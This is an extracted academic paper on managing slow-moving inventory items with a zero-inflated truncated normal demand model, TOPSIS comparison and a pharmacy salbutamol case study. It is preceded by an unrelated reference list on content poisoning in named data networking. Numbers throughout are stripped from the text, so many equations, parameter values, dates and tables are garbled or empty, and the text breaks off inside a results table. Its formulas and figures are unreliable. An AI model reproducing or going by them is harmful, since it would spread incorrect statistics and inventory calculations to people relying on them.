tarkoma s, ain m, visala k. . the publish/subscribe internet routing paradigm (psirp): designing the future internet architecture. in: tselentis g, ed. towards the future internet. amsterdam: ios press, – .
tourani r, misra s, mick t, panwar g. . security, privacy, and access control in information-centric networking: a survey. ieee communications surveys & tutorials ( ): – doi . /comst. . .
ullah ss, ullah i, khattak h, khan ma, adnan m, hussain s, amin nu, khattak mak. . a lightweight identity-based signature scheme for mitigation of content poisoning attack in named data networking with internet of things. ieee access : – doi . /access. . .
wang y, qi z, lei k, liu b, tian c. . preventing bad content dispersal in named data networking. in: proceedings of the acm turing th celebration conference - china, acm tur-c ' . new york: association for computing machinery.
wein jm, kloninger jj, nottingham mc, karger dr, lisiecki pa. . content delivery network (cdn) content server request handling mechanism with metadata framework support. us patent , , . available at https://patents.google.com/patent/us b /en.
wu d, xu z, chen b, zhang y. . what if routers are malicious? mitigating content poisoning attack in ndn. in: ieee trustcom/bigdatase/ispa, – august , tianjin, china. piscataway: ieee, – .
yue p, li r, pang b. . register before publishing with smart forwarding, mitigate content poisoning attack in icn. in: ieee international conference on parallel distributed processing with applications, big data cloud computing, sustainable computing communications, social computing networking. piscataway: ieee, – .
zhang z, yu y, zhang h, newberry e, mastorakis s, li y, afanasyev a, zhang l. . an overview of security support in named data networking. ieee communications magazine ( ): – .
submitted june accepted august published september corresponding author fernando rojas, fernando.rojas@uv.cl academic editor ka-chun wong additional information and declarations can be found on page doi . /peerj-cs. copyright rojas et al.
distributed under creative commons cc-by . open access

managing slow-moving item: a zero-inflated truncated normal approach for modeling demand
fernando rojas , , peter wanke , giuliani coluccio , juan vega-vargas and gonzalo f. huerta-canepa
micro-bioinnovation center, universidad de valparaíso, valparaíso, chile; school of nutrition and dietetics, universidad de valparaíso, valparaíso, chile; coppead, universidade federal do rio de janeiro, rio de janeiro, brazil; department of industrial and systems engineering, faculty of engineering, universidad de tarapacá, arica, chile; faculty of engineering and sciences, universidad adolfo ibáñez, viña del mar, chile

abstract
this paper proposes a slow-moving item management method based on the intermittent demand per unit time and the lead time demand of items in service enterprise inventory models. our method uses the zero-inflated truncated normal statistical distribution, which makes it possible to model intermittent demand per unit time using a mixed statistical distribution. we conducted numerical experiments, based on an algorithm used to forecast intermittent demand over a fixed lead time, to show that our proposed distributions improve the performance of the continuous review inventory model with shortages. we evaluated multi-criteria elements (total cost, fill-rate, shortage quantity per cycle, and the adequacy of the statistical distribution of the lead time demand) for decision analysis using the technique for order of preference by similarity to ideal solution (topsis). we confirmed that our method improved the performance of the inventory model in comparison with other commonly used approaches such as simple exponential smoothing and croston's method. we found an interesting association between the intermittency of demand per unit of time, the square root of this same parameter, and reorder point decisions, which could be explained using a classical multiple linear regression model. we confirmed that the variability parameter of the zero-inflated truncated normal statistical distribution used to model intermittent demand was positively related to the reorder point decisions. our study examined a decision analysis using an illustrative example. our suggested approach is original and valuable and, in the case of slow-moving item management for service companies, allows for the verification of decision-making using multiple criteria.

subjects algorithms and analysis of algorithms, data science, optimization theory and computation, scientific computing and simulation, operating systems
keywords demand during lead time, inventory models, zero-inflated truncated normal statistical distribution

how to cite this article rojas f, wanke p, coluccio g, vega-vargas j, huerta-canepa gf. . managing slow-moving item: a zero-inflated truncated normal approach for modeling demand. peerj comput. sci. :e doi . /peerj-cs.

introduction and literature review
intermittent demand occurs when the demand per unit of time (dput) for products, parts, or pieces in some periods is zero (syntetos et al., ). this type of dput is
intermittent dput a common occurrence for service and commercial companies that supply parts to industry sectors such as aerospace (ayu nariswari, bamford & dehe, ), automotive (zhang & xiaofeng, ), information technology (antosz & ratnayake, ), and military (babai, syntetos & teunter, ). this particular frequency in demand could impact different company strategies (pavlas et al., ; devika et al., ), such as the use of inventory models (jonkman, barbosa-póvoa & bloemhof, ). inventory models reduce costs and establish optimal stock levels in order to meet the demand for components and final products for customers (rojas et al., ). however, in models predicting zero demand, its parameters are not calculated the same because demand is characterized by intermittency, and the particularities of the intermittent demand need to be considered to develop more accurate inventory models (gregersen & hansen, ). inventory models that consider this type of demand are called slow-moving items (hahn & leucht, ). intermittent dput is also characterized by high variability across the non-zero values that compose the demand, requiring precise forecast models to be used in inventory models(kim & kim, ). traditional inventory models are based on a fixed demand (teixeira, lopes & figueiredo, ). however, updated models should factor in the uncertainty of demand (aloulou, dolgui & kovalyov, ). the uncertainty of dput and lead time demand (ltd) is a crucial aspect in supply chain management (khosravi et al., ). one of the most commonly used models in service company supply is the q,r model, which is a continuous review inventory model system (ponte et al., ; wen et al., ). this model reorders a fixed quantity (q) in a single period and makes a purchase or production order under an on-hand inventory level named the reorder point (r). we only need the average dput forecast to determine q, but knowing the complete ltd distribution is required to determine r. in order to facilitate calculations, a normal distribution for both dput and ltd is usually assumed (johnson, kotz & balakrishnan, ). nevertheless, other distributions used to model dput, lead time (lt), and ltd can provide more accurate inventory modeling. table in cobb, rumí & salmerón ( ) provides a summary of the distributions used in stochastic inventory models. although the normal distributed q,r model is competent at inventory management, applying it in models of intermittent demand could produce biased results. normal distribution does not work in intermittent demand modeling because it is difficult to predict empirical variation produced between non-zero and zero dputs. to address this problem and to treat this kind of data, several forecasting methods have been developed such as the: simple statistical smoothing methods, croston’s variant of exponential smoothing (croston, ; kourentzes, ), and bootstrap methods (willemain, smart & schwarz, ; ewbank et al., ). among these, the bootstrap methods have shown the best precision in updating the ltd and distributing the underlying probability of non-zero values. however, all of these methods have problems in providing precise estimates, given that the overdispersion of data coming from an intermittent dput negatively affects parameters estimation and truncated probability distributions. (zeileis, kleiber & jackman, ) and (yang, ) improved parameter estimation using the maximum likelihood rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
method that combines variable counts, zero mass points (hurdle models), counts truncated on the left, and counts censored on the right (zero-adjusted models). these distributions may be especially suitable for intermittent demand because of their ability to explicitly model non-zero and zero demand cases. statistical mixture distribution models can describe, estimate, and simulate these types of data (bethea, ). here we highlight the q,r model and its use in slow-moving items. using a zero-inflated statistical distribution to model intermittent demand appears promising, but its inventory modeling performance has not been adequately evaluated or compared to other methods (Ünlü, ). our objective was to propose a slow-moving item management model that uses the zero-inflated truncated normal (zitno) mixture distribution, whose normal component is defined only on the positive reals, to model intermittent dput forecasting with non-zero values and the ltd by means of a zero-inflated truncated normal sum (zitnosum). we examined their performance using a continuous review inventory model with shortage that included total costs of inventory, fill-rate, the quantity of inventory shortage per cycle, and the statistical distribution of ltd. in 'background', we describe the background of our proposal. we explain how to generate and implement several intermittent dput forecast models, including one predicting ltd when lt is constant. we use the following statistical distributions: zitno / zitnosum, simple exponential smoothing / simple exponential smoothing sum, and croston's / croston's sum, a simple exponential smoothing method variant. 'numerical experiments and illustrative example' is divided into three parts. 'evaluating inventory model performance measures using topsis' shows the numerical experiments we conducted to demonstrate the benefits of our proposed model. we compared different inventory models with multi-criteria decisions using the technique for order of preference by similarity to ideal solution (topsis) when the statistical distributions modeled the dput and ltd. in 'effect of variability and intermittent dput with zitno statistical distribution on total costs and q and r decisions', we determine how the parameter of variability and the proportion of zeros contained in the zitno statistical distribution affected total costs, q, and r. in 'analyzing real data using an illustrative example', we show a decision analysis using an illustrative example. finally, in 'discussion', we discuss our findings, the limitations of the study, and our conclusions. background forecasting intermittent dput and ltd in this section, we show how to forecast an item's complete ltd distribution. let y be a random variable representing the dput. this dput is intermittent, meaning that it is sometimes zero and sometimes not, which creates great variability in the data. let s be the ltd, which corresponds to a random sum expressed as: $S=\sum_{t=T+1}^{T+k} Y_t$, ( ) where k is the fixed lt used for forecasting ltd, with mean $E(k)=\mu_k$ and variance $\mathrm{Var}(k)=\sigma^2_k=0$. we consider k fixed when calculating ltd random variables using the formula $\{Y_{t+1}+\cdots+Y_{t+k},\,k\in\mathbb{N}\}$. we calculate the ltd mean and variance using $E(Y_{t+1}+\cdots+Y_{t+k})=\mu_S$ and $\mathrm{Var}(Y_{t+1}+\cdots+Y_{t+k})=\sigma^2_S$.
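as a concrete illustration of this random-sum definition, the short base-r sketch below builds ltd realizations by summing an intermittent dput series over consecutive windows of a fixed lead time k and then estimates $\mu_S$ and $\sigma^2_S$. it is illustrative only: the toy demand series, lead time, and variable names are assumptions, not values taken from this study.

```r
# illustrative base-r sketch: ltd as the sum of dput over a fixed lead time k
set.seed(1)
y <- rbinom(200, 1, 0.3) * round(rnorm(200, mean = 10, sd = 3))  # toy intermittent dput
k <- 5                                                            # assumed fixed lead time

# non-overlapping lead-time windows: S = Y_{t+1} + ... + Y_{t+k}
s <- sapply(seq(1, length(y) - k + 1, by = k),
            function(t0) sum(y[t0:(t0 + k - 1)]))

mu_s     <- mean(s)   # estimate of the ltd mean, mu_S
sigma2_s <- var(s)    # estimate of the ltd variance, sigma^2_S
c(mu_s = mu_s, sigma2_s = sigma2_s)
```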
(willemain, smart & schwarz, ) found that intermittent dput is often executed in strokes with longer sequences of zeros and other non-zero values. for this reason, it is possible to use a pattern of autocorrelation and a markov process of two first-order states can be used to forecast this random variable with temporal sequence. starting with a prediction of the sequence of zero and non-zero values during the k lt periods, these forecasts are conditioned to determine whether the last demand, yt , is zero or non-zero. using the counts of a historical or simulated demand time series, it possible to estimate the probabilities of state transitions (mosteller & tukey, ). scientific computing and simulation overlay play fundamental roles in generating knowledge and studying decision- making (salvatier, wiecki & fonnesbeck, ). it is therefore necessary to assign numeric values to non-zero predictions that cannot be based on unrealistic bootstraps, particularly those with poorly estimated ltd distribution tails made with values from the same historical data set. this problem is solved with jittering, defined as adding some random variations assumed with normal distribution in order to allow the use of values closer to the historical data. we adapted this method to generate a ltd jitter that is able to occupy an intermittent dput in a simulation approach for slow-moving items. a summary of this approach can be found in algorithm . the execution of algorithm requires r software, a free software for statistics and graphs that is used across the international scientific community, and can be consulted in the codes attached to this work with the name of ‘‘jitter.r’’. (rojas, ) used this software in supply models and programmed an r code in a generalized linear model (glm) environment. this allowed them to generate a sequence of random values following the statistical distribution zitno, as well as to estimate the parameters of this statistical distribution, among other functionalities. the rmarkovchain command of r package markovchain generates a random sequence of zero/non-zero markers of a known length for an random variable using an estimated transition probability matrix (spedicato, ). modeling dput and ltd with a constant lt in this subsection we show three statistical distributions that can be occupied when modeling of random variable dput, and three modeling distributions of the ltd, which is the sum of this random variable in a constant lt. these three pairs of statistical distributions are: simple exponential smoothing /simple exponential smoothing sum, croston’s / croston’s sum and zitno / zitnosum. for all cases, the following models assume that dput forecast are generated from a time t + ,...,t +m. for the ltd, it is assumed that lt is constant (µk ). dput and ltd forecasts are generated from algorithm . simple exponential smoothing / simple exponential smoothing sum this approach assume that ltd follows a normal statistical distribution and a fixed lt. the ltd mean and variance are calculated as follows: rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm generating intermittent dput and ltd forecasts for use in a slow-moving item inventory management model : generate a random sample of intermittent dputs of zitno statistical distribution of length n and fixed and known parameters. : estimate the transition probability matrix of the zero and non-zero dputs of n generated in step . 
: conditional on the last observed demand, generate a random sequence of zero/non- zero dput markers of known length using the transition probability matrix estimated in step . : replace every non-zero state marker with a numerical value sampled at random, with replacement, from the original set of observed non-zero dputs generated in step . : estimate the parameters of normal distribution adjusted to the non-zero values of the random sample with replacement achieved in step . : generate a ‘‘jitter’’ of the non-zero dput values, replacing the non-zero markers generated in step with random numbers generated from the normal statistical distribu- tion with estimated parameters in step . : from the sample ‘‘jitter’’ obtained in step , sum the values over the horizon of a constant lt to get ltd forecast values. (i) considering the mean level of dput as µses, and estimate using µses= t+m t+m∑ t=t+ (γyt +( −γ)µt− ses), where γ is a smoothing constant between and , selected to minimize ∑t+m t=t+ (yt − µses) ,t =t+ ,...,t+m. to initialize the smoothing, we can use the average of the first two demands µo= y +y . (ii) the dput variance with this approach can be calculated from: var(y )=σ ses= t+m t+m∑ t=t+ (yt −µses) ,∀y. the mean of k demands over the lt (µsses) is given by µsses =µkµses, and the variance of k demands over the lead time (σ ses) is calculated using one-step ahead forecast difference between the actual dput data and the mean lag, using the expression σ ses = m ∑t+m t=t+ (yt −µt− ses) . the variance of the ltd distribution (σ sses) can be estimated as: σ sses =σ sesµk . croston’s / croston’s sum variant of simple exponential smoothing method croston’s approach considers the dput mean using exponential smoothing that is separate from: rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (i) the mean intervals of data conformed between non-null demands (here, the smoothed estimate is denoted by it ) and (ii) the mean sizes of these intervals (here, the smoothed estimate is denoted by st ). in addition, q is the time interval since the last non-zero demand. croston’s approach can be described as follows: if y = , then st =st− it = it− q =q+ , ( ) else st =γyt +( −γ)st− it =γq+( −γ)it− q = . ( ) the combination of the size and interval estimates from eqs. ( ) and ( ), the dput mean can be expressed as: µcrost = t+m t+m∑ t=t+ ( st it ) these estimates update whenever a demand non null realization occurs. when a demand occurs during the same review interval, croston’s approach is identical to conventional exponential smoothing, where st =µtcrost . to initialize croston’s approach, we use the time until the first event and the size of the first event. the dput variance when using this method can be expressed as: var(y )=σ crost = t+m t+m∑ t=t+ (yt −µcrost ) . croston’s method also considers ltd with a constant lt and normal statistical distribution. the mean is expressed as: µscrost =µkµcrost, and the variance is calculated as: σ scrost =σ crostµk . rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. zero inflated truncated normal / zero inflated truncated normal sum in this model, we assumed that dput has a zitno distribution and ltd has a zitnosum distribution with a constant lt. 
we estimated the mean level of dput (µzitno) and its variance (σ zitno) using: e(y )=µzitno=( −ν) ∫ ry> yφ (y−µno σno ) σno dy;with y > , and var(y )=σ zitno= t+m t+m∑ t=t+ (yt −µzitno) , respectively, where µno and σno are mean parameters and the standard deviation (sd) of a normal distribution of subset y > . note that y forecasting length measures from t+ to t+m. on the other hand, the expected ltd value (µszitnosum) and its variance (σ szitno ) under zitnosum distribution is calculated by: µszitnosum =µkµzitno, and σ szitnosum =σ zitnoµk, respectively. intermittent dput and ltd in the q,r model with shortage in q,r model with shortage, the expected annual total cost is the a sum of: (i) the product of the expected product stock quantity (in units) and holding cost per product unit per year (hc); (ii) the product of the expected number of orders per year and the ordering cost(oc), and finally (iii) the product of the unit punishment cost (sc) per units of the item in short supply, the expected number of orders per year, and the expected number of units of shortage product per year, which is a function of the reorder point (s(r)). we assumed that the organization maintains intermittent demand every day of the year ( ). the expected total cost per year (tc) in the (q,r) model can be expressed as: tc=g(q,r)= ( q +r−µs ) hc+ µ q oc+s(r) µ q sc, ( ) where µand µs values (note that the sequence of values of y forecast values from t+ to t+m, and that the dput sum needed to forecast the ltd is calculated using lt = k), can be calculated according to the probabilistic modeling showed in tables and . for diverse dput and ltd statistical distributions, see the probability density functions (pdfs), cumulative distribution functions (cdfs) and parameters in tables and (hadley & whitin, ; johnson & montgomery, ; silver, pyke & peterson, ). rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table modeling dput. distribution pdf cdf parameters zitno ( −ν)φ( y−µno σno ) σno (y> ) ν+( −ν) ( y−µno σno ) µno ∈r,σno > +ν (y= ) , <ν < simple exponential smoothing φ( y−µses σses ) σses ( y−µses σses ) µses ∈r,σses > croston’s φ( y−µcrost σcrost ) σcrost ( y−µcrost σcrost ) µcrost ∈r,σcrost > table modeling ltd. distribution pdf cdf parameters zitnosum ( −νs)φ( s−µnoµk σno(µk ) ) σno(µk ) (s> ) νs+( −νs) ( s−µnoµk σno(µk ) ) µnoµk ∈r,σno(µk)> +νs (s= ) ,µk = , <νs < simple exponential smoothing sum φ( s−µsesµk σsesµk ) σsesµk ( s−µsesµk σsesµk ) µsesµk ∈r,σsesµk > croston’s sum φ( s−µcrost µk σcrost µk ) σcrost µk ( s−µcrost µk σcrost µk ) µcrostµk ∈r,σcrostµk > in this formula, µ corresponds to the expected annual demand, to express the annual costs referred to in eq. ( ). however, µs does not require this transformation. q and r correspond to lot size decision variable to order and reorder points, respectively. s(r) is the expected shortage per cycle calculated as: s(r)= ∫ smax r (s−r)fs(s)ds, ( ) where smax is the maximum ltd value and the ltd pdf is denoted by fs(·). this expression can also be calculated using different assumptions ltd pdf assumptions shown in table . for any statistical distribution of dput and ltd, we can solver eq. ( ) using an iterative method, considering an initial solution of q= √ coµ ch (nahmias, ). here, the probability of obtaining a stockout when given the complement of the cdf (fs(r)) can be expressed as: −fs(r)= qhc µsc . 
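before turning to the distribution tables just referenced, a minimal base-r sketch of the forecast-generation procedure in the algorithm listed earlier (steps 1 to 7) may help make it concrete. all parameter values and names are illustrative assumptions; the two-state markov chain is sampled directly rather than through the markovchain package used by the authors, and the normal "jitter" is fitted to the observed non-zero dputs for simplicity.

```r
# minimal base-r sketch of the jitter procedure (algorithm steps 1-7); illustrative only.
set.seed(2)

## step 1: random sample of intermittent dput (zitno-like: zeros plus positive normal draws)
n  <- 300
nu <- 0.4                                         # assumed proportion of zeros
y  <- ifelse(runif(n) < nu, 0, abs(rnorm(n, mean = 10, sd = 2)))

## step 2: estimate the transition probability matrix of the zero/non-zero states
state <- as.integer(y > 0)                        # 0 = zero demand, 1 = non-zero demand
trans <- prop.table(table(state[-n], state[-1]), margin = 1)

## steps 3-4: conditional on the last observed state, simulate zero/non-zero markers over
## the lead time and replace non-zero markers by resampled observed non-zero dputs
k       <- 5                                      # assumed constant lead time
markers <- integer(k)
prev    <- state[n]
for (i in 1:k) {
  prev       <- sample(c(0L, 1L), 1, prob = trans[as.character(prev), ])
  markers[i] <- prev
}
nonzero <- y[y > 0]
draws   <- ifelse(markers == 1, sample(nonzero, k, replace = TRUE), 0)

## steps 5-6: fit a normal to the non-zero values (simplification: the algorithm fits to the
## resampled values) and "jitter" the non-zero draws with it, keeping them non-negative
mu_nz    <- mean(nonzero); sd_nz <- sd(nonzero)
jittered <- ifelse(draws > 0, pmax(rnorm(k, mu_nz, sd_nz), 0), 0)

## step 7: sum over the lead-time horizon to obtain one ltd forecast realization
sum(jittered)
```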
to calculate the argument of this function (r), we applied this inverse function: r =f− s ( − qhc µsc ). ( ) to estimate the expected vale of s(r) function in eq. ( ) and to find the optimum lot size, we used: q= √ µ(oc+s(r)) hc . ( ) we repeated eqs. ( ) and ( ) until we reached a value of variation smaller than a previously established minimum threshold. we were then able to calculate lower q∗,r∗ values than eq. ( ). rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. measuring inventory model performance in this section, we will define some previously proposed general performance measures to evaluate a continuous review inventory model. these measures are applicable for the dput and ltd modeling shown in tables and . we will define four measures of performance: total costs, expected shortage per cycle, fill-rate, and the kullback–leibler divergence. finally, we present a multi-criteria decision analysis method using topsis that occupies the previously indicated performance measures as criteria to evaluate dput and ltd modeling alternatives. total cost of continuous review with the shortage inventory model by carrying out the iterations shown in a previous subsection, we calculated the decision variables that minimize the total cost of continuous review with shortage inventory model tc=g(q∗,r∗), applied to eq. ( ) for each model in tables and . an inventory model is more effective when it results in a lower annual cost. expected shortage per cycle we used a previously explained performance measurement to obtain the value of the expected amount of shortage per cycle (s(r∗)) given in eq. ( ), for each of the tested models in tables and . an inventory model is more effective when it results in a lower expected shortage per cycle. fill-rate (sobel, ) defined the fill-rate of a supply system as: ‘‘the fraction of demand that is met from on-hand inventory, understanding that the satisfaction of the demand is restricted to the amount purchased and available’’. we calculated the fill-rate for each statistical distribution shown in tables and using eq. ( ): fill−rate= ∫ q∗ o yf (y)dy∫ my yf (y)dy , ( ) where f (y) are the pdfs that are shown in table , and my is the maximal dput for each of the evaluated distributions. an inventory model is more effective when its fill-rate indicator value is closer to . kullback–leibler divergence to determine the quality of the proposed pdf and ltd approximation in table , we used the kullback–leibler divergence (cobb, ): kullback– leibler= ∫ ∞ −∞ log ( f (x) f̃ (x) ) f (x)dx, ( ) where f (·) is the unknown true pdf and f̃ (·) its approximation. to calculate the kullback– leibler divergence show in ( ), we used the kernel estimate to establish the true pdf (langseth et al., ). using eq. ( ), we computed the sequence {s ,...,sn} of n ltd realizations (or data). according to the data, we defined the kernel estimate of the unknown rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. pdf of ltd fs(·) using: f̂s(s)= nh n∑ i= k ( si−s h ) , s≥ , ( ) where k(·) is a kernel function satisfying ∫ ∞ k(x)ds= , h a smoothing parameter and s the point at which the pdf is estimated. once eq. 
( ) has been calculated, the kullback–leibler divergence for each ltd distribution established in table with support [a,b] can be expressed as: kullback– leibler′= ∫ b a log ( f̂s(s) f̃s(s) ) f̂s(s)ds, ( ) where f̂s(s) is the kernel estimate and f̃ (s) are the approximations proposed in table . we selected one of the approximations with a smaller kullback–leibler value than the one calculated using eq. ( ). topsis this multi-criteria decision analysis analyzes the geometric distances between a chosen solution, the ideal solution, and the least suitable solution (yoon & hwang, ; aye, gupta & wanke, ; de andrade, antunes & wanke, ). numerical experiments and illustrative example we used algorithm to generate intermittent dput and intermittent ltd. we performed repetitions or scenarios of dput samples using a zitno statistical distribution length n= , with the parameters µno = and σno = , a random proportion of zeros in the sample (ν), and an uniform generation in the interval [ , ]. this framework is applicable to each of the scenarios of the montecarlo (mc) study, where we assumed an expected ltd value = periods. for each scenario, we generated dput data ‘‘jitter’’ simulated from the transition matrix of the markov chain. therefore, each ltd scenario had a length of periods. for each scenario, we also generated uniform order costs (oc∼u[ ; ]), holding costs (hc∼u[ ; . ]) and shortage costs (sc∼u[ ; ]). these coefficients were chosen based on see table and appendix c in (wanke, ). to model the intermittent dput we used the statistical distributions in table , and to model ltd we used the statistical distributions shown in table . next, we estimated the parametersof normaldputand ltdprobabilitydistribution usingthe fitdist command of the gamlss package, and the ets and crost commands of the tsintermittent for simple exponential smoothing and croston’s method in r software. we occupied both of these parameters as the oc,hc and sc coefficients to obtain q∗,r∗, and tc values in eq. ( ) for each scenario. interested readers can consult the codes attached to this work under the names ‘‘zitno.r’’ and ‘‘topsissimulation.r’’. evaluating inventory model performance measures using topsis in this subsection, we used the topsis method to evaluate the performance of a continuous review inventory models with shortage. the dput/ltd modeling pairs were simple rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. exponential smoothing / simple exponential smoothing sum, croston’s /croston’s sum and zitno/zitnosum. figure compare boxplots (a) to (o) of performance measures of tc, s(r) and kullback–leibler divergence, segmented in data groups formed according to the level of intermittency of the dput ( <ν < . , . <ν < . , . <ν < . , . <ν < . and . <ν < ), between the proposal statistical distributions for results of scenarios of indicated inventory model. in this figure we have labeled simple exponential smoothing as ses. note that for all level of intermittency of the dput, except to <ν < . the indicated performance measures of inventory model are lower using the zitno statistical distribution. we confirm this statement using the respective kruskall-wallis tests (results not shown). in the case of the fill-rate comparison there were no differences, and its median was always in all the cases of intermittent levels of the dput and for all the statistical distributions studied (results not shown). 
table shows the ranked % of topsis order for each probability distribution model, segmented by intermittency level of the dput. note that in all cases, the statistical distribution zitno get better performance in the inventory model of continuous review with shortage, occupying a multi-criteria evaluation of decisions using topsis. effect of variability and intermittent dput with zitno statistical dis- tribution on total costs and q and r decisions this subsection discusses more in-depth how the parameter of variability (σno) and the proportion of zeros (ν) used to define the zitno statistical distribution affect the total costs and q and r decisions. with this objective, we repeated the simulation scheme proposed in ‘numerical experiments and illustrative example’, but considered a more significant dput variability, setting the parameter at σno = , and maintaining the parameter at µno= . figure shows scatterplots between the proportion of zeros in the dput (ν, labeled in x-axe as propdput) and tc, and q and r decisions, in scenarios where σno = and σno= . we explored these relationships using classical multiple linear regression analysis, where to avoid the problem of multicollinearity we used standardized values of the independent variables ν and √ ν (aiken, west & reno, ). table shows only the relationship between r ∼ ν+ √ ν (σno = ). in this model the adjusted r- squared is . . note that the regressor of ν is negative and significant, while the regressor of √ ν is positive and significant. these relationships can be explained by the expression of r =µkµzitno +z √ σ szitnosum =µkµzitno +z √ σ zitnoµk = µkµzitno+z √ t+m ∑t+m t=t+ (yt −µzitno) µk , where z is a security quantile of a standard normal distribution, and µzitno=( −ν) ∫ ry> yφ (y−µno σno ) σno dy;with y > . then, when ν decreases (there are more non-zero demands), r increases to have enough stock to deal with this situation, while when √ ν increases, the variance of the dput also increases, therefore it requires a larger safety stock and r to have enough stock for this case. rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure comparative boxplots (a) to (o) between proposal statistical distributions of tc, s(r) and kullback–leibler divergence segmented by ν. full-size doi: . /peerjcs. /fig- finally, we compared the differences between the optimal tcs, and the q and r decisions where σno= and σno= . table depicts descriptive measures such as mean, sd , interquartile range, and , , , and -th quantiles of r under both scenarios. we found significant differences for the wilcoxon signed-rank test with continuity correction regarding r decisions. analyzing real data using an illustrative example in order to show proposed method using real data, we selected a product experiencing intermittent demand from the inventory of a chilean public pharmacy. first, we carried rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table rank topsis order (%) for statistical distributions compared. distributions ν rank topsis order (%) zitno/ . <ν < , , zitnosum . <ν < . , , . <ν < . , , . <ν < . , , <ν < . , , simple exponential smoothing / . <ν < , , , simple exponential smoothing sum . <ν < . , , , . <ν < . , , , . <ν < . , , , <ν < . , , , croston’s / croston’s sum . <ν < , , , croston’s sum . <ν < . , , , . <ν < . , , , . <ν < . , , , <ν < . 
, , , out a statistical dput study using an adapted zitno statistical distribution. second, we evaluated the performance of a q,r supply model with a dput shortage and zitno statistical distribution. case presentation. public pharmacies in chile do not base their supply practices on drug availability (rojas et al., ). instead, they manage and maintain a mix of inventory. as shown in (rojas et al., ), models that factor in uncertain demands and shortages are useful for pharmacies. currently, chilean pharmacies manage their orders based on an annual needs planning with divided monthly orders and can be corrected up or down %, depending on the amount of inventory on hand. this method tries to comply with pharmaceutical safety recommendations, but suffers from supply decisions based on scientific criteria. this consequently increases total costs related to inventory management. therefore, it is necessary to design a supply policy that minimizes involved costs, considers drug demands, and ensures that patients receive their treatments on time. in this illustration, we carried out a statistical study of the dput for one product used in asthma treatments (called salbutamol) in an anonymous chilean public hospital pharmacy. we proposed an optimized inventory system with reduced costs. statistical study of the data set. we studied a data set of the daily demand of salbutamol inhalators. the data set spanned days. in order to study the temporal dependence of this data set, we looked at its autocorrelation function (acf) and partial acf (pacf) of dput, considering and not considering the null values (zeros). figure shows plots of the acfs and pacfs. we detected a small partial autocorrelation when the null data (zeros) were included, which may be due to the fact that the article obeys a medical prescription rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . . . a) propdput t c . . . b) propdput q . . . c) propdput r . . . d) propdput t c . . . e) propdput q . . . f) propdput r figure scatterplots: (a) tc∼ν(σno = ), (b) q∼ν(σno = ), (c) r ∼ν(σno = ), (d) tc∼ν(σno = ), (e) q∼ν(σno = ), and (f) r ∼ν(σno = ). full-size doi: . /peerjcs. /fig- table relationship between r ∼ν+ν (σno = ). estimate std. error t value pr(>|t|) (intercept) . . . . ν − . . − . . √ ν . . . . table descriptive measures of r decisions (scenarios where σno = and σno = ). r decisions mean sd iqr % % % % % r(σno = ) . . . . . . . . r(σno = ) . . . . . . . . rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. . . . lag a c f a) acf series with zeros − . . . lag p a rt ia l a c f b) pacf series with zeros − . . . . lag a c f c) acf series withouth zeros − . . . lag p a rt ia l a c f d) pacf series withouth zeros figure acf and pacf of the data set: with zeros (a and b) and without zeros (c and d). full-size doi: . /peerjcs. /fig- table descriptive statistical indicators for the daily demand data set. dataset min max mean median sd cv cs ck n with zeros . . . − . − . without zeros . . . . − . every certain number of periods ( -day lag). in any case, the autocorrelation and partial autocorrelation was negligible. table shows the size, minimum and maximum values, mean, median, sd, coefficient of variation (cv), coefficient of skewness (cs), and coefficient of kurtosis (ck) of the daily demand data set. 
the raw data of ‘analyzing real data using an illustrative example’ is available to readers in supplemental files. figure shows an empirical quantile–quantile plot to confirm the good standing of our proposed statistical distribution zitno dput model. quantile–quantile plot is a graphical method for comparing two probability distributions by plotting their quantiles against each other. in this case, the proposed theoretical distribution (zitno) is compared rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. − − zitno quantiles e m p ir ic a l q u a n til e s figure quantile–quantile plot for statistical distribution proposal. full-size doi: . /peerjcs. /fig- table parameters of the proposed statistical distribution to model dput and ltd and its competi- tors. statistical modeling parameters distribution random variable zitno dput µno = . unit/day, σno = . unit/day, ν= . simple exponential smoothing dput µses = . unit/day, σses = . unit/day croston’s dput µcrost = . unit/day, σcrost = . unit/day zitnosum ltd µnoµk = . unit/day, σzitno √ µk = . unit/day, νs = . simple exponential smoothing sum ltd µsesµk = . unit/day, σses √ µk = . unit/day croston’s sum ltd µcrostµk = . unit/day, σcrost √ µk = . unit/day with respect to the empirical distribution, where the points should ideally approach a diagonal line. since all values were within confidence bands, we propose that the statistical distribution correctly fits the data. table shows the parameters calculated using our proposed statistical distribution and its competitors. proposed statistical distribution inventory model performance. we considered the following costs involved in the application of a q,r inventory model with shortage: hc= , usd$/(unit*year), oc= , usd$/order, sc= , usd$/cycle, and constant ltd = days. table shows the performance measures relative to q*, r, tc, s (r), fill-rate, and kullback–leibler divergence when applying an q,r inventory model with shortage and the rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table q,r model with shortage performance measures using the proposed statistical distribution to model dput/ltd. modeling q* r tc s(r) (quantity fill-rate 